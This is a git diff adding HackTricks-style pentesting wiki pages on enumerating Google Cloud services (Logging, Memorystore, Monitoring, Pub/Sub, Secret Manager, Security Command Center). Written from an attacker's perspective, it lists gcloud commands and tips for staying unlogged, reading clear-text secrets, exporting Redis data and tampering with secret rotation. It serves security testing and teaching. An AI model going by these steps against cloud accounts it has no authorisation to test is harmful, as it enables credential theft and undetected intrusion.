+
+By default **Admin Write** operations (also called Admin Activity audit logs) are the ones logged (write metadata or configuration information) and **can't be disabled**.
+
+Then, the user can enable **Data Access audit logs**, these are **Admin Read, Data Write and Data Write**.
+
+You can find more info about each type of log in the docs: [https://cloud.google.com/iam/docs/audit-logging](https://cloud.google.com/iam/docs/audit-logging)
+
+However, note that this means that by default **`GetIamPolicy`** actions and other read actions are **not being logged**. So, by default an attacker trying to enumerate the environment won't be caught if the sysadmin didn't configure to generate more logs.
+
+To enable more logs in the console the sysadmin needs to go to [https://console.cloud.google.com/iam-admin/audit](https://console.cloud.google.com/iam-admin/audit) and enable them. There are 2 different options:
+
+* **Default Configuration**: It's possible to create a default configuration and log all the Admin Read and/or Data Read and/or Data Write logs and even add exempted principals:
+
+<figure><img src="../../../.gitbook/assets/image (338).png" alt=""><figcaption></figcaption></figure>
+
+* **Select the services**: Or just **select the services** you would like to generate logs and the type of logs and the excepted principal for that specific service.
+
+Also note that by default only those logs are being generated because generating more logs will increase the costs.
+
+### Enumeration
+
+The `gcloud` command-line tool is an integral part of the GCP ecosystem, allowing you to manage your resources and services. Here's how you can use `gcloud` to manage your logging configurations and access logs.
+
+{% code overflow="wrap" %}
+```bash
+# List buckets
+gcloud logging buckets list
+gcloud logging buckets describe <bucket-name> --location <location>
+
+# List log entries: only logs that contain log entries are listed.
+gcloud logging logs list
+
+# Get log metrics
+gcloud logging metrics list
+gcloud logging metrics describe <metric-name>
+
+# Get log sinks
+gcloud logging sinks list
+gcloud logging sinks describe <sink-name>
+
+# Get log views
+gcloud logging views list --bucket <bucket> --location global
+gcloud logging views describe --bucket <bucket> --location global <view-id> # view-id is usually the same as the bucket name
+
+# Get log links
+gcloud logging links list --bucket _Default --location global
+gcloud logging links describe <link-id> --bucket _Default --location global
+```
+{% endcode %}
+
+Example to check the logs of **`cloudresourcemanager`** (the one used to BF permissions): [https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512](https://console.cloud.google.com/logs/query;query=protoPayload.serviceName%3D%22cloudresourcemanager.googleapis.com%22;summaryFields=:false:32:beginning;cursorTimestamp=2024-01-20T00:07:14.482809Z;startTime=2024-01-01T11:12:26.062Z;endTime=2024-02-02T17:12:26.062Z?authuser=2\&project=digital-bonfire-410512)
+
+There aren't logs of **`testIamPermissions`**:
+
+<figure><img src="../../../.gitbook/assets/image (2) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-logging-post-exploitation.md" %}
+[gcp-logging-post-exploitation.md](../gcp-post-exploitation/gcp-logging-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-logging-persistence.md" %}
+[gcp-logging-persistence.md](../gcp-persistence/gcp-logging-persistence.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://cloud.google.com/logging/docs/logs-views#gcloud](https://cloud.google.com/logging/docs/logs-views#gcloud)
+* [https://betterstack.com/community/guides/logging/gcp-logging/](https://betterstack.com/community/guides/logging/gcp-logging/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
new file mode 100644
index 0000000000..169225779a
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-memorystore-enum.md
@@ -0,0 +1,47 @@
+# GCP - Memorystore Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Memorystore
+
+Reduce latency with scalable, secure, and highly available in-memory service for [**Redis**](https://cloud.google.com/sdk/gcloud/reference/redis) and [**Memcached**](https://cloud.google.com/sdk/gcloud/reference/memcache). Learn more.
+
+```bash
+# Memcache
+gcloud memcache instances list --region <region>
+gcloud memcache instances describe <INSTANCE> --region <region>
+# You should try to connect to the memcache instances to access the data
+
+# Redis
+gcloud redis instances list --region <region>
+gcloud redis instances describe <INSTACE> --region <region>
+gcloud redis instances export gs://my-bucket/my-redis-instance.rdb my-redis-instance --region=us-central1
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
new file mode 100644
index 0000000000..d192106683
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-monitoring-enum.md
@@ -0,0 +1,85 @@
+# GCP - Monitoring Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Monitoring offers a suite of tools to **monitor**, troubleshoot, and improve the performance of your cloud resources. From a security perspective, Cloud Monitoring provides several features that are crucial for maintaining the security and compliance of your cloud environment:
+
+### Policies
+
+Policies **define conditions under which alerts are triggered and how notifications are sent**. They allow you to monitor specific metrics or logs, set thresholds, and determine where and how to send alerts (like email or SMS).
+
+### Dashboards
+
+Monitoring Dashboards in GCP are customizable interfaces for visualizing the **performance and status of cloud resources**. They offer real-time insights through charts and graphs, aiding in efficient system management and issue resolution.
+
+### Channels
+
+Different **channels** can be configured to **send alerts** through various methods, including **email**, **SMS**, **Slack**, and more.
+
+Moreover, when an alerting policy is created in Cloud Monitoring, it's possible to **specify one or more notification channels**.
+
+### Snoozers
+
+A snoozer will **prevent the indicated alert policies to generate alerts or send notifications** during the indicated snoozing period. Additionally, when a snooze is applied to a **metric-based alerting policy**, Monitoring proceeds to **resolve any open incidents** that are linked to that specific policy.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get policies
+gcloud alpha monitoring policies list
+gcloud alpha monitoring policies describe <policy>
+
+# Get dashboards
+gcloud monitoring dashboards list
+gcloud monitoring dashboards describe <dashboard>
+
+# Get snoozers
+gcloud monitoring snoozes list
+gcloud monitoring snoozes describe <snoozer>
+
+# Get Channels
+gcloud alpha monitoring channels list
+gcloud alpha monitoring channels describe <channel>
+```
+{% endcode %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-monitoring-post-exploitation.md" %}
+[gcp-monitoring-post-exploitation.md](../gcp-post-exploitation/gcp-monitoring-post-exploitation.md)
+{% endcontent-ref %}
+
+## References
+
+* [https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli](https://cloud.google.com/monitoring/alerts/manage-snooze#gcloud-cli)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md b/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md
new file mode 100644
index 0000000000..ffa213ee14
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-pub-sub.md
@@ -0,0 +1,120 @@
+# GCP - Pub/Sub Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Pub/Sub <a href="#reviewing-cloud-pubsub" id="reviewing-cloud-pubsub"></a>
+
+[Google **Cloud Pub/Sub**](https://cloud.google.com/pubsub/) is described as a service facilitating message exchange between independent applications. The core components include **topics**, to which applications can **subscribe**. Subscribed applications have the capability to **send and receive messages**. Each message comprises the actual content along with associated metadata.
+
+The **topic is the queue** where messages are going to be sent, while the **subscriptions** are the **objects** users are going to use to **access messages in the topics**. There can be more than **1 subscription per topic** and there are 4 types of subscriptions:
+
+* **Pull**: The user(s) of this subscription needs to pull for messages.
+* **Push**: An URL endpoint is indicated and messages will be sent immediately to it.
+* **Big query table**: Like push but setting the messages inside a Big query table.
+* **Cloud Storage**: Deliver messages directly to an existing bucket.
+
+By **default** a **subscription expires after 31 days**, although it can be set to never expire.
+
+By **default**, a message is **retained for 7 days**, but this time can be **increased up to 31 days**. Also, if it's not **ACKed in 10s** it goes back to the queue. It can also be set that ACKed messages should continue to be stored.
+
+A topic is by default encrypted using a **Google managed encryption key**. But a **CMEK** (Customer Managed Encryption Key) from KMS can also be selected.
+
+**Dead letter**: Subscriptions may configure a **maximum number of delivery attempts**. When a message cannot be delivered, it is **republished to the specified dead letter topic**.
+
+### Snapshots & Schemas
+
+A snapshot is a feature that **captures the state of a subscription at a specific point in time**. It is essentially a consistent **backup of the unacknowledged messages in a subscription**. By creating a snapshot, you preserve the message acknowledgment state of the subscription, allowing you to resume message consumption from the point the snapshot was taken, even after the original messages would have been otherwise deleted.\
+If you are very lucky a snapshot could contain **old sensitive information** from when the snapshot was taken.
+
+When creating a topic, you can indicate that the **topic messages must follow a schema**.
+
+### Enumeration
+
+```bash
+# Get a list of topics in the project
+gcloud pubsub topics list
+gcloud pubsub topics describe <topic>
+gcloud pubsub topics list-subscriptions <topic>
+gcloud pubsub topics get-iam-policy <topic>
+
+# Get a list of subscriptions across all topics
+gcloud pubsub subscriptions list
+gcloud pubsub subscriptions describe <subscription>
+gcloud pubsub subscriptions get-iam-policy <subscription>
+
+# Get list of schemas
+gcloud pubsub schemas list
+gcloud pubsub schemas describe <schema>
+gcloud pubsub schemas list-revisions <schema>
+
+# Get list of snapshots
+gcloud pubsub snapshots list
+gcloud pubsub snapshots describe <snapshot>
+```
+
+However, you may have better results [**asking for a larger set of data**](https://cloud.google.com/pubsub/docs/replay-overview), including older messages. This has some prerequisites and could impact applications, so make sure you really know what you're doing.
+
+### Privilege Escalation & Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-pub-sub-post-exploitation.md" %}
+[gcp-pub-sub-post-exploitation.md](../gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
+{% endcontent-ref %}
+
+## Pub/Sub Lite
+
+[**Pub/Sub Lite**](https://cloud.google.com/pubsub/docs/choosing-pubsub-or-lite) is a messaging service with **zonal storage**. Pub/Sub Lite **costs a fraction** of Pub/Sub and is meant for **high volume streaming** (up to 10 million messages per second) pipelines and event-driven system where low cost is the primary consideration.
+
+In PubSub Lite there **are** **topics** and **subscriptions**, there **aren't snapshots** and **schemas** and there are:
+
+* **Reservations**: Pub/Sub Lite Reservations is a feature that allows users to reserve capacity in a specific region for their message streams.
+* **Operations**: Refers to the actions and tasks involved in managing and administering Pub/Sub Lite.
+
+### Enumeration
+
+```bash
+# lite-topics
+gcloud pubsub lite-topics list
+gcloud pubsub lite-topics describe <topic>
+gcloud pubsub lite-topics list-subscriptions <topic>
+
+# lite-subscriptions
+gcloud pubsub lite-subscriptions list
+gcloud pubsub lite-subscriptions describe <subscription>
+
+# lite-reservations
+gcloud pubsub lite-reservations list
+gcloud pubsub lite-reservations describe <topic>
+gcloud pubsub lite-reservations list-topics <topic>
+
+# lite-operations
+gcloud pubsub lite-operations list
+gcloud pubsub lite-operations describe <topic>
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
new file mode 100644
index 0000000000..87ea24f726
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-secrets-manager-enum.md
@@ -0,0 +1,79 @@
+# GCP - Secrets Manager Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Secret Manager
+
+Google [**Secret Manager**](https://cloud.google.com/solutions/secrets-management/) is a vault-like solution for storing passwords, API keys, certificates, files (max 64KB) and other sensitive data.
+
+A secret can have **different versions storing different data**.
+
+Secrets by **default** are **encrypted using a Google managed key**, but it's **possible to select a key from KMS** to use to encrypt the secret.
+
+Regarding **rotation**, it's possible to configure **messages to be sent to pub-sub every number of days**, the code listening to those messages can **rotate the secret**.
+
+It's possible to configure a day for **automatic deletion**, when the indicated day is **reached**, the **secret will be automatically deleted**.
+
+### Enumeration
+
+```bash
+# First, list the entries
+gcloud secrets list
+gcloud secrets get-iam-policy <secret_name>
+
+# Then, pull the clear-text of any version of any secret
+gcloud secrets versions list <secret_name>
+gcloud secrets versions access 1 --secret="<secret_name>"
+```
+
+### Privilege Escalation
+
+In the following page you can check how to **abuse secretmanager permissions to escalate privileges.**
+
+{% content-ref url="../gcp-privilege-escalation/gcp-secretmanager-privesc.md" %}
+[gcp-secretmanager-privesc.md](../gcp-privilege-escalation/gcp-secretmanager-privesc.md)
+{% endcontent-ref %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md" %}
+[gcp-secretmanager-post-exploitation.md](../gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
+{% endcontent-ref %}
+
+### Persistence
+
+{% content-ref url="../gcp-persistence/gcp-secret-manager-persistence.md" %}
+[gcp-secret-manager-persistence.md](../gcp-persistence/gcp-secret-manager-persistence.md)
+{% endcontent-ref %}
+
+### Rotation misuse
+
+An attacker could update the secret to **stop rotations** (so it won't be modified), or **make rotations much less often** (so the secret won't be modified) or to **publish the rotation message to a different pub/sub**, or modifying the rotation code being executed (this happens in a different service, probably in a Clound Function, so the attacker will need privileged access over the Cloud Function or any other service)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md
new file mode 100644
index 0000000000..dac57f94cb
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-services/gcp-security-enum.md
@@ -0,0 +1,120 @@
+# GCP - Security Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Google Cloud Platform (GCP) Security encompasses a **comprehensive suite of tools** and practices designed to ensure the **security** of resources and data within the Google Cloud environment, divided into four main sections: **Security Command Center, Detections and Controls, Data Protection and Zero Turst.**
+
+## **Security Command Center**
+
+The Google Cloud Platform (GCP) Security Command Center (SCC) is a **security and risk management tool for GCP** resources that enables organizations to gain visibility into and control over their cloud assets. It helps **detect and respond to threats** by offering comprehensive security analytics, **identifying misconfigurations**, ensuring **compliance** with security standards, and **integrating** with other security tools for automated threat detection and response.
+
+* **Overview**: Panel to **visualize an overview** of all the result of the Security Command Center.
+* Threats: \[Premium Required] Panel to visualize all the **detected threats. Check more about Threats below**
+* **Vulnerabilities**: Panel to **visualize found misconfigurations in the GCP account**.
+* **Compliance**: \[Premium required] This section allows to **test your GCP environment against several compliance checks** (such as PCI-DSS, NIST 800-53, CIS benchmarks...) over the organization.
+* **Assets**: This section **shows all the assets being used**, very useful for sysadmins (and maybe attacker) to see what is running in a single page.
+* **Findings**: This **aggregates** in a **table findings** of different sections of GCP Security (not only Command Center) to be able to visualize easily findings that matters.
+* **Sources**: Shows a **summary of findings** of all the different sections of GCP security **by sectio**n.
+* **Posture**: \[Premium Required] Security Posture allows to **define, assess, and monitor the security of the GCP environment**. It works by creating policy that defines constraints or restrictions that controls/monitor the resources in GCP. There are several pre-defined posture templates that can be found in [https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy](https://cloud.google.com/security-command-center/docs/security-posture-overview?authuser=2#predefined-policy)
+
+### **Threats**
+
+From the perspective of an attacker, this is probably the **most interesting feature as it could detect the attacker**. However, note that this feature requires **Premium** (which means that the company will need to pay more), so it **might not be even enabled**.
+
+There are 3 types of threat detection mechanisms:
+
+* **Event Threats**: Findings produced by matching events from **Cloud Logging** based on **rules created** internally by Google. It can also scan **Google Workspace logs**.
+  * It's possible to find the description of all the [**detection rules in the docs**](https://cloud.google.com/security-command-center/docs/concepts-event-threat-detection-overview?authuser=2#how_works)
+* **Container Threats**: Findings produced after analyzing low-level behavior of the kernel of containers.
+* **Custom Threats**: Rules created by the company.
+
+It's possible to find recommended responses to detected threats of both types in [https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event\_response](https://cloud.google.com/security-command-center/docs/how-to-investigate-threats?authuser=2#event_response)
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get a source
+gcloud scc sources describe <org-number> --source=5678
+## If the response is that the service is disabled or that the source is not found, then, it isn't enabled
+
+# Get notifications
+gcloud scc notifications list <org-number>
+
+# Get findings (if not premium these are just vulnerabilities)
+gcloud scc findings list <org-number>
+```
+{% endcode %}
+
+### Post Exploitation
+
+{% content-ref url="../gcp-post-exploitation/gcp-security-post-exploitation.md" %}
+[gcp-security-post-exploitation.md](../gcp-post-exploitation/gcp-security-post-exploitation.md)
+{% endcontent-ref %}
+
+## Detections and Controls
+
+* **Chronicle SecOps**: An advanced security operations suite designed to help teams increase their speed and impact of security operations, including threat detection, investigation, and response.
+* **reCAPTCHA Enterprise**: A service that protects websites from fraudulent activities like scraping, credential stuffing, and automated attacks by distinguishing between human users and bots.
+* **Web Security Scanner**: Automated security scanning tool that detects vulnerabilities and common security issues in web applications hosted on Google Cloud or another web service.
+* **Risk Manager**: A governance, risk, and compliance (GRC) tool that helps organizations assess, document, and understand their Google Cloud risk posture.
+* **Binary Authorization**: A security control for containers that ensures only trusted container images are deployed on Kubernetes Engine clusters according to policies set by the enterprise.
+* **Advisory Notifications**: A service that provides alerts and advisories about potential security issues, vulnerabilities, and recommended actions to keep resources secure.
+* **Access Approval**: A feature that allows organizations to require explicit approval before Google employees can access their data or configurations, providing an additional layer of control and auditability.
+* **Managed Microsoft AD**: A service offering managed Microsoft Active Directory (AD) that allows users to use their existing Microsoft AD-dependent apps and workloads on Google Cloud.
+
+## Data Protection
+
+* **Sensitive Data Protection**: Tools and practices aimed at safeguarding sensitive data, such as personal information or intellectual property, against unauthorized access or exposure.
+* **Data Loss Prevention (DLP)**: A set of tools and processes used to identify, monitor, and protect data in use, in motion, and at rest through deep content inspection and by applying a comprehensive set of data protection rules.
+* **Certificate Authority Service**: A scalable and secure service that simplifies and automates the management, deployment, and renewal of SSL/TLS certificates for internal and external services.
+* **Key Management**: A cloud-based service that allows you to manage cryptographic keys for your applications, including the creation, import, rotation, use, and destruction of encryption keys. More info in:
+
+{% content-ref url="gcp-kms-enum.md" %}
+[gcp-kms-enum.md](gcp-kms-enum.md)
+{% endcontent-ref %}
+
+* **Certificate Manager**: A service that manages and deploys SSL/TLS certificates, ensuring secure and encrypted connections to your web services and applications.
+* **Secret Manager**: A secure and convenient storage system for API keys, passwords, certificates, and other sensitive data, which allows for the easy and secure access and management of these secrets in applications. More info in:
+
+{% content-ref url="gcp-secrets-manager-enum.md" %}
+[gcp-secrets-manager-enum.md](gcp-secrets-manager-enum.md)
+{% endcontent-ref %}
+
+## Zero Trust
+
+* **BeyondCorp Enterprise**: A zero-trust security platform that enables secure access to internal applications without the need for a traditional VPN, by relying on verification of user and device trust before granting access.
+* **Policy Troubleshooter**: A tool designed to help administrators understand and resolve access issues in their organization by identifying why a user has access to certain resources or why access was denied, thereby aiding in the enforcement of zero-trust policies.
+* **Identity-Aware Proxy (IAP)**: A service that controls access to cloud applications and VMs running on Google Cloud, on-premises, or other clouds, based on the identity and the context of the request rather than by the network from which the request originates.
